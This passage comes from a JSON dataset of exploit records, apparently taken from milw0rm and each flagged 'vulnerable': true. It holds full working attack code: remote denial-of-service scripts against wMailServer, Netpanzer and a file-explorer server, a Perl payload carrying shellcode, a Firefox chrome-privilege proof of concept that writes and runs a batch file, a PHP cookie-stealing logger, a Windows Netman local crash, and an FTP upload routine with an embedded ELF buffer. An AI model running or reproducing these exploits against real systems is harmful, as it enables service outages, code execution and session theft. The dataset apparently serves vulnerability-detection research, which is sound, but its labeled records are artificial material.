\x00\\x00\"\n\n\"\\x00\\x47\\x43\\x43\\x3a\\x20\\x28\\x47\\x4e\\x55\\x29\\x20\\x32\\x2e\\x39\\x35\"\n\n\"\\x2e\\x33\\x20\\x32\\x30\\x30\\x31\\x30\\x33\\x31\\x35\\x20\\x28\\x53\\x75\\x53\"\n\n\"\\x45\\x29\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x30\"\n\n\"\\x31\\x2e\\x30\\x31\\x00\\x00\\x00\\x00\\x2e\\x73\\x79\\x6d\\x74\\x61\\x62\\x00\"\n\n\"\\x2e\\x73\\x74\\x72\\x74\\x61\\x62\\x00\\x2e\\x73\\x68\\x73\\x74\\x72\\x74\\x61\"\n\n\"\\x62\\x00\\x2e\\x74\\x65\\x78\\x74\\x00\\x2e\\x72\\x6f\\x64\\x61\\x74\\x61\\x00\"\n\n\"\\x2e\\x64\\x61\\x74\\x61\\x00\\x2e\\x73\\x62\\x73\\x73\\x00\\x2e\\x62\\x73\\x73\"\n\n\"\\x00\\x2e\\x63\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x2e\\x6e\\x6f\\x74\\x65\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n\n\"\\x06\\x00\\x00\\x00\\x80\\x80\\x04\\x08\\x80\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x21\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xc0\\x80\\x04\\x08\"\n\n\"\\xc0\\x00\\x00\\x00\\x60\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x20\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x29\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n\n\"\\x03\\x00\\x00\\x00\\x20\\x91\\x04\\x08\\x20\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x2f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x20\\x91\\x04\\x08\"\n\n\"\\x20\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x35\\x00\\x00\\x00\\x08\\x00\\x00\\x00\"\n\n\"\\x03\\x00\\x00\\x00\\x20\\x91\\x04\\x08\\x20\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x3a\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x20\\x01\\x00\\x00\\x23\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x43\\x00\\x00\\x00\\x07\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x43\\x01\\x00\\x00\\x14\\x00\\x00\\x00\"\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x11\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x57\\x01\\x00\\x00\\x49\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n\n\nstrcpy(filename, \"aa\");\n\nmemset(exploitBuf,0,777);\n\nmemcpy(exploitBuf, haggis_magic_buffer, 776);\n\nexploitBufLen=776;\n\nif((controlSock=connect_to_server(ftpPort))==FAILURE) {\n\nprintf(\"\\nCould not connect to target server\\n\");\n\nexit(1);\n\n}\n\nlogin_to_server();\n\nmy_send(controlSock, \"MKD incoming\\r\\n\");\n\nmy_recv(controlSock);\n\nmy_send(controlSock, \"SITE CHMOD 777 incoming\\r\\n\");\n\nmy_recv(controlSock);\n\nmy_send(controlSock, \"CWD incoming\\r\\n\");\n\nmy_recv(controlSock);\n\nset_passive_mode(UPLOAD);\n\nupload_file();\n\nmy_send(controlSock, \"SITE CHMOD 777 aa\\r\\n\");\n\nclose(controlSock);\n\n}\n\n\n\n// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.\n\nvoid my_sleep(int n) {\n\nstruct timespec t;\n\n\n\nt.tv_sec=0;\n\nt.tv_nsec=n;\n\nnanosleep(&t,&t);\n\n}\n\n\n\n// milw0rm.com [2003-10-13]",
545        "vulnerable": true
546    },
547    {
548        "exploit_id": 1100,
549        "content": "#!/usr/local/bin/perl\n\n#\n\n#    Remote File Explorer DoS Exploit\n\n# ----------------------------------------\n\n#\n\n# Resolve host... [OK]\n\n#  [+] Connecting... [OK]\n\n# Target locked\n\n# Sending bad procedure... [OK]\n\n#  [+] Server DoS'ed\n\n#\n\n# Tested on Windows2000 SP4\n\n# Info: infamous.2hell.com\n\n\n\n\n\n$ARGC=@ARGV;\n\nif ($ARGC !=1) {\n\n    print \"Usage: $0 <host>\\n\";\n\n    print \"Example: $0 127.0.0.1\\n\";\n\n    exit;\n\n}\n\nuse Socket;\n\n\n\nmy($remote,$port,$iaddr,$paddr,$proto);\n\n$remote=$ARGV[0];\n\n$port = \"1001\"; # default port for the server\n\n\n\n$iaddr = inet_aton($remote) or die \"Error: $!\";\n\n$paddr = sockaddr_in($port, $iaddr) or die \"Error: $!\";\n\n$proto = getprotobyname('tcp') or die \"Error: $!\";\n\n\n\nsocket(SOCK, PF_INET, SOCK_STREAM, $proto) or die \"Error: $!\";\n\nconnect(SOCK, $paddr) or die \"Error: $!\";\n\n\n\n$sploit = \"|REBOOT_COMPUTER|\".\n\n\"\\xeb\\x6e\\x5e\\x29\\xc0\\x89\\x46\\x10\".\n\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\n\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\n\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\n\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\n\n\"\\x80\\x43\\xc6\\x46\\x10\\x10\\x88\\x46\".\n\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\n\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\n\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\n\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\n\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\n\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\n\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\n\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\n\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\n\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\n\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\n\n\"\\x3f\\x41\\xcd\\x80\\xb0\\x3f\\x41\\xcd\".\n\n\"\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\".\n\n\"\\xf3\\x8d\\x4b\\x0c\\xb0\\x0b\\xcd\\x80\".\n\n\"\\xe8\\x8d\\xff\\xff\";\n\n\n\n\n\n$msg = $sploit;\n\nprint $msg;\n\nsend(SOCK, $msg, 0) or die \"Cannot send query: $!\";\n\nsleep(1);\n\nclose(SOCK);\n\nexit;\n\n\n\n# milw0rm.com [2005-07-11]",
550        "vulnerable": true
551    },
552    {
553        "exploit_id": 1101,
554        "content": "/*****************************************************************\n\n\n\nwMailServer Remote D.o.S Exploit by Kozan\n\n\n\nApplication: wMailServer\n\nVendor: Softiacom Software - www.softiacom.com\n\n\n\nDiscovered by: fRoGGz - SecuBox Labs\n\nExploit Coded by: Kozan\n\nCredits to ATmaCA, fRoGGz, SecuBox Labs\n\nWeb: www.spyinstructors.com\n\nMail: kozan@spyinstructors.com\n\n\n\n*****************************************************************/\n\n\n\n#include <winsock2.h>\n\n#include <stdio.h>\n\n#include <windows.h>\n\n\n\n#pragma comment(lib,\"ws2_32.lib\")\n\n\n\nchar Buff[] =\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n       fprintf(stdout, \"wMailServer Remote D.o.S Exploit by Kozan\\n\");\n\n       fprintf(stdout, \"Discovered by: fRoGGz - SecuBox Labs\\n\");\n\n       fprintf(stdout, \"Exploit Coded by: Kozan\\n\");\n\n       fprintf(stdout, \"Credits to ATmaCA, fRoGGz, SecuBox Labs\\n\\n\");\n\n       fprintf(stdout, \"www.spyinstructors.com - kozan@spyinstructors.com\\n\");\n\n\n\n       if(argc<2)\n\n       {\n\n               fprintf(stderr, \"\\n\\nUsage: %s [Target IP]\\n\\n\", argv[0]);\n\n               return -1;\n\n       }\n\n       WSADATA wsaData;\n\n       SOCKET sock;\n\n\n\n       if( WSAStartup(0x0101,&wsaData) < 0 )\n\n       {\n\n               fprintf(stderr, \"Winsock error!\\n\");\n\n               return -1;\n\n       }\n\n\n\n       sock = socket(AF_INET,SOCK_STREAM,0);\n\n       if( sock == -1 )\n\n       {\n\n               fprintf(stderr, \"Socket error!\\n\");\n\n               return -1;\n\n       }\n\n\n\n       struct sockaddr_in addr;\n\n\n\n       addr.sin_family = AF_INET;\n\n       addr.sin_port = htons(25);\n\n       addr.sin_addr.s_addr = inet_addr(argv[1]);\n\n       memset(&(addr.sin_zero), '\\0', 8);\n\n\n\n       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )\n\n       {\n\n               fprintf(stderr, \"Connection failed!\\n\");\n\n               closesocket(sock);\n\n               return -1;\n\n       }\n\n\n\n       if( send(sock,Buff,strlen(Buff),0) == -1 )\n\n       {\n\n               fprintf(stderr, \"DoS string could not sent!\\n\");\n\n               closesocket(sock);\n\n               return -1;\n\n       }\n\n\n\n       fprintf(stdout, \"Operation completed...\\n\");\n\n       closesocket(sock);\n\n       WSACleanup();\n\n\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-07-12]",
555        "vulnerable": true
556    },
557    {
558        "exploit_id": 1102,
559        "content": "// Exploit by Michael Krax\n\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n\n<html>\n\n<head>\n\n<title>Firewalling - Proof-of-Concept</title>\n\n<script>\n\nfunction stopload() {\n\n// in some cases the javascript url never stops to load\n\n// therefore we force a stop after the real image got loaded\n\nwindow.setTimeout(\"window.stop()\",1000);\n\n}\n\n</script>\n\n</head>\n\n<body>\n\n<div style=\"font-family:Verdana;font-size:11px;\">\n\n\n\n<div style=\"font-family:Verdana;font-size:15px;font-weight:bold;\">\n\nFirewalling - Proof-of-Concept</div>\n\n<div style=\"width:600px\">\n\nThe \"Set As Wallpaper\" dialog takes the image url as a parameter without validating it.\n\nThis allows to execute javascript in chrome and to run arbitrary code.\n\n<br><br>\n\nBy using absolute positioning and the moz-opacity filter an attacker can easily fool the\n\nuser to think he is setting a valid image as wallpaper.\n\n<br><br>\n\nRight click on the image and choose \"Set As Wallpaper\". The demo requests\n\nUniversalXPConnect rights, creates c:\\booom.bat and launches the batch file\n\nthat shows a directoy listing in a dos box (Windows only).\n\n<br><br>\n\n\n\n<div style=\"position:relative; width:300px; height:250px;\">\n\n<img src=\"javascript:/*-----------------------------*/eval('if(document.location.href.\n\nsubstr(0,6)==\\'chrome\\'){netscape.security.PrivilegeManager.enablePrivilege(\\'\n\nUniversalXPConnect\\');file=Components.classes[\\'@mozilla.org/file/local;1\\'].\n\ncreateInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\'c:\\\\\\\\\n\nbooom.bat\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,\n\n420);outputStream=Components.classes[\\'@mozilla.org/network/file-output-stream;\n\n1\\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init\n\n(file,0x04|0x08|0x20,420,0);output=\\'@ECHO OFF\\\\n:BEGIN\\\\nCLS\\\\nDIR\\\\nPAUSE\n\n\\\\n:END\\';outputStream.write(output,output.length);outputStream.close();file.launch\n\n();}else{void(0)}')\" width=\"300\" height=\"250\" alt=\"\" border=\"0\" style=\"position:\n\nabsolute; left:0px; top:0px; z-index:2; -moz-opacity:0;\">\n\n<img src=\"http://www.milw0rm.com/images/logo.png\" width=\"300\" height=\"250\" alt=\"\" border=\"0\" style=\"position:\n\nabsolute; left:0px; top:0px; z-index:1;\" onload=\"stopload()\">\n\n</div>\n\n</div>\n\n</body>\n\n\n\n</html>\n\n\n\n# milw0rm.com [2005-07-13]",
560        "vulnerable": true
561    },
562    {
563        "exploit_id": 1103,
564        "content": "// Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/\n\n\n\n<?php\n\n$cookie = $_GET['c'];\n\n$ip = getenv ('REMOTE_ADDR');\n\n$date=date(\"j F, Y, g:i a\");\n\n$referer=getenv ('HTTP_REFERER');\n\n$fp = fopen('cookies.txt', 'a');\n\nfwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');\n\nfclose($fp);\n\n?>\n\n\n\n//rename it to cookies.php and create one new file steal.php and chmod it to 777\n\n\n\n# milw0rm.com [2005-07-13]",
565        "vulnerable": true
566    },
567    {
568        "exploit_id": 1104,
569        "content": "/* Windows Netman Service Local DOS Vulnerability.\n\n * \n\n * By bkbll bkbll#cnhonker.net 2005-7-14 2:49??\n\n *\n\n * TESTED ON win2k sp4\n\n * \n\n * ??Netman???svchost.exe -k netsvcs??, ????????,????????:\n\n * \n\n * EventSystem,Irmon,RasMan,NtmsSvc,SENS\n\n * \n\n */\n\n#define _WIN32_DCOM\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <objbase.h>\n\n#include <unknwn.h>\n\n#include <windows.h>\n\n\n\n#pragma comment(lib,\"ole32\")\n\n    \n\nMIDL_INTERFACE(\"98133274-4B20-11D1-AB01-00805FC1270E\")\n\nVCConnectionManagerEnumConnection //: public IDispatch\n\n{\n\npublic:\n\n\tvirtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0;\n\n\tvirtual ULONG STDMETHODCALLTYPE AddRef( void) = 0;\n\n\tvirtual ULONG STDMETHODCALLTYPE Release( void) = 0;\n\n\tvirtual HRESULT STDMETHODCALLTYPE next(void) = 0;\n\n\tvirtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0;\n\n\tvirtual HRESULT STDMETHODCALLTYPE reset(void) = 0;\n\n\tvirtual HRESULT STDMETHODCALLTYPE clone(void) = 0;\n\n};\n\nCLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};\n\nIID IID_IEnumNetConnection  = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}};\n\n\n\n//???\n\nmain(int argc,char **argv)\n\n{\n\n\tVCConnectionManagerEnumConnection *clientcall;\n\n\tHRESULT hr;\n\n\t\n\n\tprintf(\"Windows Netman Service Local DOS Vulnerability..\\n\\n\");\n\n\t//???\n\n\tCoInitializeEx(NULL,COINIT_MULTITHREADED);\n\n\n\n\tprintf(\"DCOM Client Trying started\\n\");\n\n\thr = CoCreateInstance(CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetConnection,(void**)&clientcall);\n\n\tif (hr != S_OK)\n\n\t{\n\n\t\tprintf(\"CoCreateInstanceEx failed:%d\\n\",GetLastError());\n\n\t\treturn -1;\n\n\t}\n\n\tprintf(\"Exploit netman service ....\\n\");\n\n\thr = clientcall->skip(0x80000001);//(void**)&p);\n\n\tif(SUCCEEDED(hr))\n\n\t{\n\n\t\tprintf(\"Call client proc Success.\\n\");\n\n\t}\n\n\telse\n\n\t\tprintf(\"Call client proc failed:%d\\n\",GetLastError());\n\n\thr = clientcall->Release();\n\n\tCoUninitialize();\n\n\tprintf(\"Client exited.\\n\");\n\n\treturn 1;\n\n}\n\n\n\n// milw0rm.com [2005-07-14]",
570        "vulnerable": true
571    },
572    {
573        "exploit_id": 1105,
574        "content": "/*\n\n\n\nby Luigi Auriemma\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n\n\n#ifdef WIN32\n\n    #include <winsock.h>\n\n/*\n\n   Header file used for manage errors in Windows\n\n   It support socket and errno too\n\n   (this header replace the previous sock_errX.h)\n\n*/\n\n\n\n#include <string.h>\n\n#include <errno.h>\n\n\n\n\n\n\n\nvoid std_err(void) {\n\n    char    *error;\n\n\n\n    switch(WSAGetLastError()) {\n\n        case 10004: error = \"Interrupted system call\"; break;\n\n        case 10009: error = \"Bad file number\"; break;\n\n        case 10013: error = \"Permission denied\"; break;\n\n        case 10014: error = \"Bad address\"; break;\n\n        case 10022: error = \"Invalid argument (not bind)\"; break;\n\n        case 10024: error = \"Too many open files\"; break;\n\n        case 10035: error = \"Operation would block\"; break;\n\n        case 10036: error = \"Operation now in progress\"; break;\n\n        case 10037: error = \"Operation already in progress\"; break;\n\n        case 10038: error = \"Socket operation on non-socket\"; break;\n\n        case 10039: error = \"Destination address required\"; break;\n\n        case 10040: error = \"Message too long\"; break;\n\n        case 10041: error = \"Protocol wrong type for socket\"; break;\n\n        case 10042: error = \"Bad protocol option\"; break;\n\n        case 10043: error = \"Protocol not supported\"; break;\n\n        case 10044: error = \"Socket type not supported\"; break;\n\n        case 10045: error = \"Operation not supported on socket\"; break;\n\n        case 10046: error = \"Protocol family not supported\"; break;\n\n        case 10047: error = \"Address family not supported by protocol family\"; break;\n\n        case 10048: error = \"Address already in use\"; break;\n\n        case 10049: error = \"Can't assign requested address\"; break;\n\n        case 10050: error = \"Network is down\"; break;\n\n        case 10051: error = \"Network is unreachable\"; break;\n\n        case 10052: error = \"Net dropped connection or reset\"; break;\n\n        case 10053: error = \"Software caused connection abort\"; break;\n\n        case 10054: error = \"Connection reset by peer\"; break;\n\n        case 10055: error = \"No buffer space available\"; break;\n\n        case 10056: error = \"Socket is already connected\"; break;\n\n        case 10057: error = \"Socket is not connected\"; break;\n\n        case 10058: error = \"Can't send after socket shutdown\"; break;\n\n        case 10059: error = \"Too many references, can't splice\"; break;\n\n        case 10060: error = \"Connection timed out\"; break;\n\n        case 10061: error = \"Connection refused\"; break;\n\n        case 10062: error = \"Too many levels of symbolic links\"; break;\n\n        case 10063: error = \"File name too long\"; break;\n\n        case 10064: error = \"Host is down\"; break;\n\n        case 10065: error = \"No Route to Host\"; break;\n\n        case 10066: error = \"Directory not empty\"; break;\n\n        case 10067: error = \"Too many processes\"; break;\n\n        case 10068: error = \"Too many users\"; break;\n\n        case 10069: error = \"Disc Quota Exceeded\"; break;\n\n        case 10070: error = \"Stale NFS file handle\"; break;\n\n        case 10091: error = \"Network SubSystem is unavailable\"; break;\n\n        case 10092: error = \"WINSOCK DLL Version out of range\"; break;\n\n        case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\n\n        case 10071: error = \"Too many levels of remote in path\"; break;\n\n        case 11001: error = \"Host not found\"; break;\n\n        case 11002: error = \"Non-Authoritative Host not found\"; break;\n\n        case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\n\n        case 11004: error = \"Valid name, no data record of requested type\"; break;\n\n        default: error = strerror(errno); break;\n\n    }\n\n    fprintf(stderr, \"\\nError: %s\\n\", error);\n\n    exit(1);\n\n}\n\n\n\n// included winerr.h /str0ke\n\n\n\n    #define close   closesocket\n\n#else\n\n    #include <unistd.h>\n\n    #include <sys/socket.h>\n\n    #include <sys/types.h>\n\n    #include <arpa/inet.h>\n\n    #include <netinet/in.h>\n\n    #include <netdb.h>\n\n#endif\n\n\n\n\n\n\n\n#define VER         \"0.1\"\n\n#define PORT        3030\n\n#define TIMEOUT     5\n\n\n\n\n\n\n\nint timeout(int sock);\n\nu_long resolv(char *host);\n\nvoid std_err(void);\n\n\n\n\n\n\n\nint main(int argc, char *argv[]) {\n\n    struct  sockaddr_in peer;\n\n    int     sd;\n\n    u_short port = PORT;\n\n\n\n\n\n#ifdef WIN32\n\n    WSADATA    wsadata;\n\n    WSAStartup(MAKEWORD(1,0), &wsadata);\n\n#endif\n\n\n\n\n\n    setbuf(stdout, NULL);\n\n\n\n    fputs(\"\\n\"\n\n        \"Netpanzer <= 0.8 endless loop \"VER\"\\n\"\n\n        \"by Luigi Auriemma\\n\"\n\n        \"e-mail: aluigi@autistici.org\\n\"\n\n        \"web:    http://aluigi.altervista.org\\n\"\n\n        \"\\n\", stdout);\n\n\n\n    if(argc < 2) {\n\n        printf(\"\\n\"\n\n            \"Usage: %s <host> [port(%d)]\\n\"\n\n            \"\\n\", argv[0], port);\n\n        exit(1);\n\n    }\n\n\n\n    if(argc > 2) port = atoi(argv[2]);\n\n\n\n    peer.sin_addr.s_addr = resolv(argv[1]);\n\n    peer.sin_port        = htons(port);\n\n    peer.sin_family      = AF_INET;\n\n\n\n    printf(\"- target   %s : %hu\\n\",\n\n        inet_ntoa(peer.sin_addr), port);\n\n\n\n    fputs(\"- check server: \", stdout);\n\n    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n\n    if(sd < 0) std_err();\n\n    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))\n\n      < 0) std_err();\n\n\n\n    if(timeout(sd) < 0) {\n\n        fputs(\"\\nError: server doesn't seem to work, I have received no data\\n\\n\", stdout);\n\n        exit(1);\n\n    } else {\n\n        fputs(\"ok\\n\", stdout);\n\n    }\n\n\n\n    fputs(\"- send malformed data size\\n\", stdout);\n\n    if(send(sd, \"\\x00\\x00\", 2, 0)\n\n      <= 0) std_err();\n\n    close(sd);\n\n\n\n    fputs(\"- check server status:\\n\", stdout);\n\n    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n\n    if(sd < 0) std_err();\n\n    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))\n\n      < 0) std_err();\n\n    if(timeout(sd) < 0) {\n\n        fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\n\n    } else {\n\n        fputs(\"\\nServer doesn't seem vulnerable\\n\\n\", stdout);\n\n    }\n\n\n\n    close(sd);\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nint timeout(int sock) {\n\n    struct  timeval tout;\n\n    fd_set  fd_read;\n\n    int     err;\n\n\n\n    tout.tv_sec = TIMEOUT;\n\n    tout.tv_usec = 0;\n\n    FD_ZERO(&fd_read);\n\n    FD_SET(sock, &fd_read);\n\n    err = select(sock + 1, &fd_read, NULL, NULL, &tout);\n\n    if(err < 0) std_err();\n\n    if(!err) return(-1);\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nu_long resolv(char *host) {\n\n    struct hostent *hp;\n\n    u_long host_ip;\n\n\n\n    host_ip = inet_addr(host);\n\n    if(host_ip == INADDR_NONE) {\n\n        hp = gethostbyname(host);\n\n        if(!hp) {\n\n            printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\n\n            exit(1);\n\n        } else host_ip = *(u_long *)hp->h_addr;\n\n    }\n\n    return(host_ip);\n\n}\n\n\n\n\n\n\n\n#ifndef WIN32\n\n    void std_err(void) {\n\n        perror(\"\\nError\");\n\n        exit(1);\n\n    